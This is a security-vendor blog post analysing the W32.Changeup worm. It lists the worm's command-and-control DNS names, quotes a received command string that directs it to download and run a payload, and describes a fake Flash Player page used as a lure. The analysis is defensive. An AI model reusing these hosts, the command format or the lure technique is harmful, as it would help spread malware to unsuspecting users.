Video Screencast Help
Security Response

Why does W32.Changeup Spread?

Created: 03 Aug 2010 06:41:07 GMT • Updated: 23 Jan 2014 18:25:57 GMT • Translations available: 日本語
Takayoshi Nakayama's picture
+2 2 Votes
Login to vote

Previously I blogged about W32.Changeup being a polymorphic worm written in Visual Basic. In this blog, I will discuss the threat author’s purpose for spreading the worm.

When recent Changeup variants are executed, they attempt to acquire a host IP address from one of the following DNS names:

  • ns1.thepicturehut.net
  • ns2.thepicturehut.net
  • ns3.thepicturehut.net
  • ns4.thepicturehut.net

Even though the host DNS is not currently accessible and IP addresses cannot be acquired, it is possible for the author to modify the DNS settings in the future. If an IP address can be acquired through DNS, Changeup accesses TCP port 8000 and it then receives data that includes the URL to download files from. The following is a screenshot of part of the packet capture:
 

This is an example string that is included in the received data:

:.dl [http]://code[REMOVED]:999/a abcdef.exe

This string means that Changeup would download file “a” from code[REMOVED].net through TCP port 999 and save it as a file named “abcdef.exe”. The saved file name, in this case “abcdef.exe” randomly changes every time connection is made to this host.

I downloaded this file and it was a dropper in a self-extracting archive. From the information we’ve gathered, this dropper drops four to six files. Included in these dropped files is an update of Changeup. The following are the other threats that it drops:

Furthermore, the Downloader Trojan may download any of the following threats:

On the code[REMOVED].net domain, the following Web page is the top page on this server:
 

Quite obviously this page is designed to trick anyone who visits the site into downloading malicious files. A message is displayed stating that Adobe Flash Player 10 is required to play the video and a link is also provided.

However, in reality the link for the file is to [http]://code[REMOVED].net/flash_player.exe, which is a link to the self-archiving dropper mentioned above that drops various other threats as well as a Changeup update. Spam is also sent out through emails, Twitter, and Facebook to increase access to this page.

So from reviewing the research we have carried out up till now, I believe that the main purpose of Changeup is to spread itself and to install other threats. The following lists how it spreads, what techniques it uses to spread, and what its payload is:

  1. It spreads on a large scale through network shares and removable drives.
  2. It uses social engineering techniques to install itself.
  3. It updates itself as well as installing other threats.

Furthermore, it would appear that Changeup installs threats totally unrelated to itself. My theory for this is that Changeup is a Pay-Per-Install (PPI) service, which, if true, would fit with other research done to date. We need to be mindful that elaborate polymorphic worms, such as W32.Changeup, are used as a PPI service.